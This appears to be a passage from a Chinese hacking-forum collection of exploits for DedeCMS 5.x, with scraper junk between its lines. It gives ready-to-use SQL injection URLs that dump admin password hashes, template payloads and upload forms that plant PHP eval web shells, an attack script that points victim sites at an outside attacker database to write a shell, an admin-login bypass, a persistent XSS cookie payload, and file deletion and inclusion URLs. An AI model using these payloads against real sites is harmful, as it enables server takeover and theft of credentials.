|
|
a1 c$ O) u3 x0 E3 `6 ^Dedecms 5.6 rss注入漏洞* Z8 R1 f# K: _! W7 \" n
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
, t* e$ [) ]6 C; E X5 h
; V% G5 l" F9 O1 n4 ] d
- ~. S+ a( M. ]! j1 Z# R" a. l S$ V4 E0 s- k
, \! W3 ?/ c; l6 O$ J+ t
" n$ R6 x+ o2 U! d6 z. |0 r
: w9 W0 r( ]; S: s. s; E
X8 b: L& `. H2 o$ g4 r. C9 U2 e3 o% @ B
DedeCms v5.6 嵌入恶意代码执行漏洞# \) x5 }8 V( d5 o: d( L+ Z) N7 @8 p
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}5 l. M" [: Q* V
发表后查看或修改即可执行* X% f2 H8 l) G' j* p
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}! l/ J: Q. D4 v+ h6 v
生成x.php 密码xiao,直接生成一句话。# ] a) p. h7 P( c! x$ _! w
7 R0 m1 D' g' B" X* {6 ]
/ O3 n+ Y( W: b1 n$ h2 t9 r
* w" p8 B# D; N- F3 d
" a/ H5 e/ O) g4 w) Y4 h% u
b0 u' x" m9 E+ ~5 n- X# {1 M" f5 Y# O( _( c
0 Y3 H/ q: a0 }- [
! s+ J) S2 a- ]6 t# u1 B% ODede 5.6 GBK SQL注入漏洞
2 d$ c7 G0 W! khttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
# x9 L0 A3 R: F. D( a8 Z) _+ x) e: m5 Lhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
. N% b) L1 o+ P* C( e/ i4 K N- vhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A72 q- f( J1 N) B2 v% z+ ~; l
9 L- T. B2 I4 \. ?, ^+ k
/ t" I: r! e0 F7 ~3 }& w
! e; ~* F9 W8 b5 B3 T
7 |+ ?8 ]4 n5 H$ p7 h6 z" \ I
2 X! m, w: a: c5 w2 G o2 M! F9 J5 ]) p' |; J" v; d
$ W3 c' {/ K' ^
3 O0 t, H; B* qDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞, P- f0 B$ f: H' @- v' _! v$ L$ P
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 6 Z1 j( a5 e/ x4 k! n" J8 K
" O, ~3 t; q# [; M+ a" X5 |$ {) {2 X
% f$ k7 m1 J& w* k9 z- a
- I7 ^, _3 i; s% i$ y
9 C9 B% i5 c/ W; y, m
6 R# J1 G: L: W3 T# O0 R# ~
# V! g2 E1 O% r6 j! f( L7 h5 `DEDECMS 全版本 gotopage变量XSS漏洞/ `% S( u, w; D/ T1 m
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ' v0 n- R$ c j# u3 V- h( ?
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
" X7 e% I( a, Y1 `2 [# I
' J7 s( v+ J# ~( |4 D- x: n0 q: P7 U8 @9 J8 M1 W" `3 m. ]& V; n' e1 Q
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 # u$ S9 b( `2 \5 {5 u5 @0 t
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda- G) ~# r8 R+ i* z
9 n: f; G0 ]0 f1 D' ~3 f+ A' R% V( _) a1 I- k
http://v57.demo.dedecms.com/dede/login.php# V$ i; E/ B& E$ Y1 D: ]; o' J
* q% Y0 @/ x/ s, \! c! m
( b+ s; l4 _8 h) x* F, O. w* k" ucolor=Red]DeDeCMS(织梦)变量覆盖getshell3 ]1 T# k* A- i, B4 @
#!usr/bin/php -w
9 l5 h+ @8 n H+ }<?php8 K& ^' p/ F+ r M$ y; f4 J
error_reporting(E_ERROR);
. i. }! }+ K, U+ {. M" R# Fset_time_limit(0);* g. g( o- I/ i
print_r('0 v$ Z. O# S/ b3 G+ r
DEDEcms Variable Coverage
2 A- H" R* }+ g! F* kExploit Author: www.heixiaozi.comwww.webvul.com3 N1 {6 H& y# l
); T6 T; ^2 R* Y2 j' L* Z( {7 j
echo "\r\n";3 b) j( x; I4 \ x) ~
if($argv[2]==null){
9 F; T/ q$ u9 a1 t# Iprint_r('
- M6 T3 w1 T/ J. Z6 |+---------------------------------------------------------------------------+4 ]2 R! X9 @7 s P* T
Usage: php '.$argv[0].' url aid path& S4 e$ c& o$ _% s8 H- V Y- q
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
. V* X+ r$ Q9 d3 Z/ c) fExample:
/ q+ T! e; f& E9 Jphp '.$argv[0].' www.site.com 1 old
$ u8 J$ h& J0 u; y" v5 t+---------------------------------------------------------------------------++ q' I3 Z/ g; _& O/ Y I+ m
');
" T6 p) D: N' t# Hexit;) x0 d1 x( Z( o3 x* M% u' [
}
/ l! o3 G0 U6 k. H$url=$argv[1];
Y; K# |' f7 B$aid=$argv[2];9 A5 x4 h/ c* ]: f: X8 ]0 T, `+ o
$path=$argv[3];; n0 ? N) i% s
$exp=Getshell($url,$aid,$path);
# G3 s7 T+ A/ i# F+ Dif (strpos($exp,"OK")>12){8 g' h b% f. p% M5 z
echo "
$ b0 Z* g# z' k( [Exploit Success \n";5 k( ^+ e: Q% ]- M
if($aid==1)echo "
$ l+ g0 U/ D! T$ d, wShell:".$url."/$path/data/cache/fuck.php\n" ;6 `. `' f' M' ?
* z9 L. x" o) _; k2 W! m" \
$ s' @# R f( o( {5 sif($aid==2)echo "% ~8 W' c8 F- j o; z: S0 D* [
Shell:".$url."/$path/fuck.php\n" ;
9 l; n; h! [, y I8 S U" M
# |; @! N8 v% A& B. U( T3 N
" K% I3 `, \, O& ]" Yif($aid==3)echo "8 {5 X0 T& g$ M- V
Shell:".$url."/$path/plus/fuck.php\n";( `# r" J' s. W, v" N1 ^" I3 j; O, j) k) X" `
5 ~: z F1 i8 `/ h
" m& e2 p0 K ?# r
}else{ i. j c. W: M6 u9 P
echo "- n8 c7 U. u% e$ l6 |* `
Exploit Failed \n";- T! v( E) O. \
}, |/ T7 `! \5 x. G
function Getshell($url,$aid,$path){
+ j! r' b9 y) H3 ]: ?$id=$aid;/ R6 q; D( g( I7 x/ o8 `0 Q/ c' }# V
$host=$url;
+ d! m* x" V/ \- w; _2 \. N/ T; p$port="80";
0 u: R y) G2 G$ a9 T$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";, T. Q7 T4 i% ?
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";5 j" {. x0 Y4 ^/ ?! R5 L* S, _$ [
$data .= "Host: ".$host."\r\n";5 p7 B) ~; B4 p. r2 m9 h
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
, n- P$ z! Y$ I$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";- X' a3 S% {' q! b4 `7 ]
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
* v4 n6 w6 ]8 ?; D2 z( o3 D//$data .= "Accept-Encoding: gzip,deflate\r\n";
# G& b( S2 H* D% K$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";8 |+ X5 e* D% f' ]# r. F& i
$data .= "Connection: keep-alive\r\n"; l* y4 s9 X X
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
) b: Z9 @( p- h$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
' Z( q# i$ n0 |1 D \$data .= $content."\r\n";0 r3 L' { k/ p8 S+ _4 M
$ock=fsockopen($host,$port);
8 U' \ P# g+ q8 ~# z* h' ]if (!$ock) {
, V+ E. U3 [0 jecho "
" p4 [6 k, k* \( U0 H! y' F) SNo response from ".$host."\n";
- j; n' S1 s5 b0 H}
" O! G+ f8 p- F( N$ k9 B, Tfwrite($ock,$data);
3 ^- i/ S$ b; m) @$ l* J* a* swhile (!feof($ock)) {5 f0 C; H& S; [4 g* h! n2 w' u9 ^
$exp=fgets($ock, 1024);
: A6 Q1 n1 l3 oreturn $exp;" M+ T2 d7 o" o$ z+ o8 F
}
! T: B( b6 D( n}: l& F( L4 y! R/ M9 s* y
4 O6 ^. K) @6 O) {+ C9 v
6 j, ?/ z+ a, \( t7 @' p' X& k/ ~
?>/ M0 l3 F* D0 }, ?, q" Q
* q6 S' O1 T ~, z
( K: m+ d" P. I3 Q% e& M4 J* X
* r4 d7 L" [' v3 I! S7 z: E0 L7 ~
9 T, K% r8 r. D5 U. E4 a: ]3 |; w
, I; p1 V3 @) s! i: b, s2 ~" @: s t1 G$ D! V% X( b* g% W% v
' b: l: z) Z1 x" p# s% a( Y+ H) e! S0 X- l8 n9 ^7 f
& W( ?% \- f6 U8 w7 m& i1 ?DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)! M8 i2 `1 r- o7 c
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. _2 z8 [5 l5 b& O4 l. s* X$ y
. L% \0 t+ ?* g1 J: `0 O: J+ \% ?5 ]- N/ x
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
$ v R& l7 Y9 h1 z ?6 [) p5 s" X1 z1 E
4 f, d# y: K* w H; j6 I
此漏洞的前提是必须得到后台路径才能实现
' e) @/ {( X9 a2 q6 Y* I! x
& c$ e* q" ?# x; N0 U. @
% Q8 a/ y! _3 Y/ \& V+ B
; D% B% W" o7 F: a9 V$ E6 R( Z) A" E- R1 ^4 D! R
- m1 [$ z$ G, e- Y$ O
* x- L$ D5 F8 X& k3 ?8 }4 p
) B" r( j7 L. ^' ~/ n3 ^+ Y, F9 u( g' v
6 p- t/ V3 m! d& m# l6 v
Z" t" f5 R7 b9 n9 B# p" dDedecms织梦 标签远程文件写入漏洞
) `8 g# N8 V8 `& A+ h O前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
/ @* Z) }' ]1 l4 O3 ^% t2 f0 V2 t Z: p
% y& |3 @- y" b- M6 j8 O再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
, c% n2 l6 W" t# z/ \/ F, O<form action="" method="post" name="QuickSearch" id="QuickSearch">; {. v" A6 }$ z, V3 _( i
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
' h& z/ z, Y0 @# s% m; G<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />% o; i; p/ C2 [) ~
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />) f0 R6 s V+ @* x- J+ T4 n
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />! H8 C, ]; h8 R3 n$ Y
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
, m, ~( ^) {- H t<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- z/ n' ^% \+ f+ q<input type="text" value="true" name="nocache" style="width:400">& L" u; q: {4 }. A; ?# C: l
<input type="submit" value="提交" name="QuickSearchBtn"><br />
* S5 u. a5 O1 u</form>
% \" _7 M Y+ R<script>
7 u% ^- m `) Y2 m W1 ifunction addaction()- r0 a, o2 _4 |8 E# j6 B
{( \- |' p# W2 |
document.QuickSearch.action=document.QuickSearch.doaction.value;
: U4 l4 A6 r# y/ w8 L}( H8 R" K0 g+ I, {
</script>0 \; Z- W" W7 ]
- ~1 ?2 Z0 A7 g1 v# c# b$ R8 E: }' S
! t' a' o7 G8 M$ K3 b: W8 E( g$ i' i; x) ~0 s
4 `0 f, v+ ~0 v2 H% z6 D8 V
( z$ l/ h" L. Z/ ^
5 J. J+ ]* c# s( p
8 q! D# d' q0 _% q9 z; P3 T1 Z0 @3 y9 G$ s
: T2 x0 R* g: M5 _8 \
% K4 ?# r3 F& E2 U, A; F6 }8 i5 BDedeCms v5.6 嵌入恶意代码执行漏洞, U& Q) Y8 c. f* p
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行/ b% b! A8 M2 M* Q/ s5 k
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}% n) t' W+ c! K9 i& J- _7 i! X
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得' X7 J1 r/ i% a) \4 [
Dedecms <= V5.6 Final模板执行漏洞
' K; b$ D- ]2 R- U" x注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
8 O8 t" d. Y9 c8 P" Juploads/userup/2/12OMX04-15A.jpg
) h# Z6 c3 \/ N& b# X9 A( n! F F* L& W7 W
# j/ k: [ q1 ^8 T
模板内容是(如果限制图片格式,加gif89a):" \0 u! W) }. c
{dede:name runphp='yes'}+ y# @3 L o& W
$fp = @fopen("1.php", 'a');2 J6 H0 V: B# M4 b6 @
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");/ U8 w6 }* J- C. G- |
@fclose($fp);; D( d6 a( e( U& ?+ d
{/dede:name}1 x* L! N' [* g8 b( U* D
2 修改刚刚发表的文章,查看源文件,构造一个表单:
* W: N6 l* a0 N<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
' |. @2 K7 X' W, o! z, K<input type="hidden" name="dopost" value="save" />( W% e4 B; r! S9 `0 J2 Z) u9 h# l
<input type="hidden" name="aid" value="2" />4 }5 c! ]2 D/ b6 g h8 I
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />9 G: H- b( D3 [" k% y& A4 G E/ x8 V
<input type="hidden" name="channelid" value="1" />
" u3 T8 K$ @4 `, C<input type="hidden" name="oldlitpic" value="" />
5 u1 }; J* A% q) n. F<input type="hidden" name="sortrank" value="1275972263" />( L9 B. o, r% I) \# e
/ d9 ~+ S& D1 e
$ b- J. y [8 n: H4 A! ^<div id="mainCp">0 o: f9 D8 @' i3 G. x
<h3 class="meTitle"><strong>修改文章</strong></h3>
4 @* }, A! G5 _9 y; }" P. \5 {$ x$ a7 }
/ }) B7 U+ [- z) x, [+ E; w
<div class="postForm">
2 `) B3 U( h2 E5 t) |2 ~<label>标题:</label>
1 v9 P) w3 z6 q: U, Z/ V<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>4 R8 A$ @& J9 S! t
* C( d# l) A/ w% w- C$ X, g% H& ?
<label>标签TAG:</label>
1 ] _8 L' Z9 g<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)/ \: u* j1 ], \
$ l& Y0 `! t3 M
* x# X3 ^" t& V5 B2 E1 c<label>作者:</label>( m! e) E3 z( w
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
7 {8 K) D$ c) f& Q+ ]/ Z6 ]5 i% s+ C7 A
3 s1 L4 X8 i }+ T5 a3 a
<label>隶属栏目:</label>
' H Y2 g8 T! P5 v2 y<select name='typeid' size='1'>5 H3 C( I1 F' V$ Q% W
<option value='1' class='option3' selected=''>测试栏目</option>: o- |: ^: M) p- b+ P
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)6 u. S/ C9 m" k4 q2 c: ?6 k
6 R: \! x1 N% [" t7 i' _# X
! `- G2 D4 m7 ~6 p4 n
<label>我的分类:</label>
& M8 q/ R- }# S" p<select name='mtypesid' size='1'>3 a0 [8 l& F) d K; y
<option value='0' selected>请选择分类...</option>
4 \- v0 u- R( M& v! @- R7 s<option value='1' class='option3' selected>hahahha</option>- p4 T9 G9 K8 o; S4 ~
</select>
: i+ m+ ~6 r3 D$ c) m
' r0 \2 c4 j: S8 {; C Y" C7 H0 S, Y
<label>信息摘要:</label>
\5 y7 b, e. I$ I1 P K2 d2 n<textarea name="description" id="description">1111111</textarea>
, L5 V, f" d$ b1 Q(内容的简要说明)
+ j# c( S& a2 ~/ [7 k
4 [. D3 D0 U' Y) z# e) V6 V; [' W, F3 @3 M% @
<label>缩略图:</label>
' F* Y0 w/ ^ B+ E$ U% p) C- ?* E<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>5 y2 D' C+ V1 |1 t7 z2 r5 s
" Z. ^. L: [, I f+ z! S' Z
4 y3 R5 _" f, Y$ L1 v8 b X<input type='text' name='templet'' N |+ ?! w8 d( {
value="../ uploads/userup/2/12OMX04-15A.jpg">3 U1 _; w( d3 {7 |! b5 \ L
<input type='text' name='dede_addonfields'
* ]( B/ x# w4 D# }! o8 \4 X# ?value="templet,htmltext;">(这里构造)
1 P' ^8 _+ s* e</div># K& J, n2 l0 I5 m( {
) l1 _: q$ L: l5 c9 }6 L
: q5 P; b4 y: w1 j2 ^# M" D; W0 [
<!-- 表单操作区域 -->
- F/ Q7 K2 u$ G- l( d' U9 z; K<h3 class="meTitle">详细内容</h3>( A: e& u! I! g1 }6 ^# H
% ~1 S9 n6 ?; Q: N9 c) V* z' D
0 v W1 h7 ?2 u" e: e! Z( Z% D<div class="contentShow postForm">! E$ |/ _, c$ |! H
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>; V) }- ?/ r1 A! ?! x; W% ~! m
! l; `9 V m R- l
3 P+ x5 n( B1 b' A9 d; C" y3 T<label>验证码:</label>
& }2 U. Q2 I9 _, P<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
~0 N5 u+ g6 v" ?& k! ~3 N J+ Z<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
1 [" P7 s2 K+ i5 N% |. c8 Y0 ^* V- f% S% S/ i& j8 I* u
* @4 h2 u2 `% u8 q5 e; n% Y {
<button class="button2" type="submit">提交</button>/ d6 ]( e: Q+ M
<button class="button2 ml10" type="reset">重置</button>
5 y. J, j/ p2 |. W2 u4 j</div>
2 ~2 y* S9 F7 O% n3 e* w: _6 i4 o
* O" T" g4 X# v0 K2 {! b3 h0 \5 } r8 K: X
</div>
' ]$ r8 q/ c2 f4 n6 P4 B. n; f
6 J" n$ `7 ~+ ?4 W% Y& o: b$ t
3 ]% i/ @2 Y4 b- B# X</form>0 \+ Q& Y" |) Z# \
- a# E% t+ U; f3 @9 V
0 V6 E/ D N+ y4 E$ O( \提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:9 b$ ?2 I, N. `5 T5 s
假设刚刚修改的文章的aid为2,则我们只需要访问:2 J/ \! I+ a2 ^* x) d- Q# k: \# J' Q
http://127.0.0.1/dede/plus/view.php?aid=27 T9 W h4 p0 x% ?! e# A+ T
即可以在plus目录下生成webshell:1.php
9 b! h6 x. W! q8 R8 |+ g0 ^$ c# N8 N+ \6 D
9 B, o2 v1 A- k* P( I# `
5 q# @5 c9 q7 L5 `2 c
( S9 Y9 P; `! C1 }, u" Y: v% h2 Y8 M$ \. h0 B* A o5 M9 C
1 }1 ]; i( [3 P* s6 e# p' W6 Y
1 r% e+ _" j8 X" l6 b% q
( m2 y1 r. S4 I+ l9 _
. c% a, E$ d: Z# w, E+ i9 j7 Q! [: o# m( U# l
0 s, o4 }* g5 X. ~$ m! f
3 Y# R. w) `; m0 H& y# G! Z4 c* LDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
& \8 I2 f- t f; o, I4 L9 `+ mGif89a{dede:field name='toby57' runphp='yes'}
- T3 X3 w% c1 y6 r* o8 d8 e9 Hphpinfo();# n. _* a; I) O; x2 \! [
{/dede:field}6 h' K' P% J/ [0 R1 R, W
保存为1.gif# u/ E7 Y& P% w4 d
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 5 z3 R3 y2 U) z {- k- {8 G
<input type="hidden" name="aid" value="7" /> 8 n6 ]0 j2 _4 M& i( @" z1 K
<input type="hidden" name="mediatype" value="1" />
0 Z6 q0 G' m5 G, a. o8 v5 m. k- _<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
! g! d2 c& s1 z6 w, {- D! I<input type="hidden" name="dopost" value="save" />
. m( \# E+ Z2 i$ w: R: G& H<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
, H7 |. h: O4 ^' ~; T( I( X<input name="addonfile" type="file" id="addonfile"/> 8 w0 j# v" B' n" v% ?
<button class="button2" type="submit" >更改</button> ! z& g! V* ?9 c6 ^, ?& s5 h
</form> 6 A M, E8 B+ |2 r# e. t3 v
5 a+ v) T" d a. B$ w
9 N1 i+ U- r$ { i( V构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
1 J* u( V, ?8 [& g/ ~- A发表文章,然后构造修改表单如下:
8 h* ?0 f# U1 N# x* L+ X" v
+ m6 Z% ^& X z. j" x4 G
6 s7 N! z+ p5 g7 V, g; m<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> % Y1 G! p5 W! W: k
<input type="hidden" name="dopost" value="save" /> 4 j, E* V" W0 x0 Q
<input type="hidden" name="aid" value="2" />
- p1 F$ h# C" Y- ^5 M; i<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
2 o$ }' q: R; G( A; U4 ^0 j1 _% T<input type="hidden" name="channelid" value="1" /> 7 ^$ T, J+ ]5 N0 ^! K
<input type="hidden" name="oldlitpic" value="" /> 0 o8 f0 n. |5 Z8 W% z
<input type="hidden" name="sortrank" value="1282049150" /> ; y2 ^" b0 ~" d/ c6 p
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> / ]) M6 q9 M+ B0 s1 @% k2 X' b+ X
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
9 X9 A. [; y0 A- A<select name='typeid' size='1'>
6 D: R0 M5 i h! [<option value='1' class='option3' selected=''>Test</option> 5 i% |8 @& V0 U- Y# _/ m B1 P
<select name='mtypesid' size='1'> , ?& E5 Y- o# t5 y! R) W
<option value='0' selected>请选择分类...</option>
+ o; R; r( @- ?- }<option value='1' class='option3' selected>aa</option></select> 3 P5 ~9 w3 c* H8 S5 q: O
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 2 W% G k6 W: D5 w: S
<input type='hidden' name='dede_addonfields' value="templet"> - g1 |' m8 _' k b8 C
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ) m/ ^0 s+ n |" a& W
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
; A/ N+ T) {3 \2 D<button class="button2" type="submit">提交</button> ; b& w: N% h' B6 [& N, W* y$ T2 p
</form>4 B$ V5 T! Y" [( x& v& E9 j4 l
' W% q' \' U& W0 r- {; L, \0 T1 J; Z- [- V/ j5 E
( d n) \" {$ O/ f. @+ q
% f) x* l1 t9 ^# }9 d: h
8 X0 j1 y' M; f3 y @5 [# N X7 C; X, s4 c2 l" G
8 c* e0 u5 Z+ a* q f% u
" a+ ~0 t. j5 e: e/ @* @
9 G. t9 v8 N6 ~6 g8 n, t h1 n! ~: _3 {2 f& S
: V. e8 B% p7 D2 p
c( E: a* Q: G/ d织梦(Dedecms)V5.6 远程文件删除漏洞5 G( ?! c$ f! l6 k* g
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif9 K5 c5 b& J+ s& b
% O5 c$ G3 N2 o5 |9 U7 x" H" H9 T) \! X
, t9 h+ L/ i" c0 l, G" ]7 o+ u$ a! x
1 p# ]. _- R6 O& [6 Z- s# X; N' a5 ^( |) Y4 C' e7 I
7 v' n) s% B' Y& {' ^' t+ B4 y* |# f: ?% n1 x
3 ~) d" f) W# E# m- N
e4 C! m( k- y1 O* Z$ X; |织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 # ^ e; |; E& R$ T$ y! S
http://www.test.com/plus/carbuya ... urn&code=../../
) R$ x3 h$ I3 q! N+ d' s
8 [3 ^, p- w4 _4 \! D; r/ i, B: @3 x3 [ k9 _% f6 ^6 z
4 ]( I0 ?4 d3 o1 ?: E9 J# ~
+ w9 g9 b5 c3 N2 ?9 |0 L& j+ K; }
! v& W# g' y/ j9 }* ?2 k& a% b
) c# s3 Q+ q6 Y. ]$ ]6 A8 t1 X2 F3 I* P, F; Z
5 ~2 u6 B7 k( p0 s- ^+ y
$ H! [% J w# @4 D$ J& C |! A
5 R. H9 m, r5 W- pDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ( O* r# I' P1 J7 h/ |" W. g4 H
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
4 _: {% k/ q7 S- p& X5 `# k密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD52 ~5 {1 Q6 K) _0 {
" J' V$ q1 I! \, b5 A* Z9 T
' \/ I2 A/ r+ b/ F; p; [
1 O. O8 _: B M4 l6 a
! P9 f' U8 v" }" ~: u. I% H9 A3 P( Q2 e( q+ U
|5 _( x3 r( G$ f5 |- }" x
2 |: ^ K( h2 i; L9 }9 I
( v: s( Y" ~. D* f% h
" }" j. b6 {; _7 w# e9 l/ G0 u. o. |0 {* }1 \8 T0 Q; M+ z
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
, f. K) |( @1 x9 Zhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
( D1 Y' p6 e( i* c0 a( `9 v$ e( O2 z; [) H/ ^6 b/ d+ z L
6 s; K0 V! n9 M. e, g$ E5 M
8 V+ ~6 S, K z1 r
' i' d# ^; c# @8 X8 c3 w( s* s0 R [0 s# p, H1 j$ F# B: a' }
% X) b- i" n1 {9 w$ Q; M7 G U; v, r2 A3 F. U2 ~6 p
% g2 T( h$ _6 ]) z8 o$ E* G" c
$ _7 k# r- X: s3 w" Q
u; m7 \: F' c织梦(Dedecms)select_soft_post.php页面变量未初始漏洞! }% } s# C* m2 }8 L7 h
<html>* p* R4 Q( J" [* W
<head>
